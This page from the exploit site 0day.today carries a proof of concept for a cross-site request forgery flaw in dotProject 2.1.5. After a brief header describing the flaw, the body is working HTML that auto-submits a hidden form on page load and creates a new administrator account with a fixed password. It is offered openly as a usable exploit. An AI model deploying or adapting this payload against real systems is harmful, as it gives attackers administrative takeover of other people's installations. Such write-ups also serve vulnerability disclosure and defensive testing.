0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
dotProject 2.1.5 CSRF Vulnerability
<!------------------------------------------------------------------------ # Software................dotProject 2.1.5 # Vulnerability...........Cross-site Request Forgery # Download................http://sourceforge.net/projects/dotproject/ # Release Date............2/2/2011 # Tested On...............Windows Vista + XAMPP # ------------------------------------------------------------------------ # Author..................AutoSec Tools # Site....................http://www.autosectools.com/ # ------------------------------------------------------------------------ # # --Description-- # # A cross-site request forgery vulnerability in dotProject 2.1.5 can be # exploited to create a new admin. # # # --PoC--> <html> <body onload="document.forms[0].submit()"> <form method="POST" action="http://localhost/dotproject/index.php?m=admin"> <input type="hidden" name="user_id" value="0" /> <input type="hidden" name="contact_id" value="0" /> <input type="hidden" name="dosql" value="do_user_aed" /> <input type="hidden" name="username_min_len" value="4)" /> <input type="hidden" name="password_min_len" value="4)" /> <input type="hidden" name="user_username" value="new_admin" /> <input type="hidden" name="user_type" value="1" /> <input type="hidden" name="user_role" value="11" /> <input type="hidden" name="user_password" value="Password1" /> <input type="hidden" name="password_check" value="Password1" /> <input type="hidden" name="contact_first_name" value="x" /> <input type="hidden" name="contact_last_name" value="x" /> <input type="hidden" name="contact_company" value="0" /> <input type="hidden" name="contact_department" value="" /> <input type="hidden" name="contact_email" value="x@x.com" /> <input type="hidden" name="user_signature" value="" /> </form> </body> </html> # 0day.today [2024-07-16] #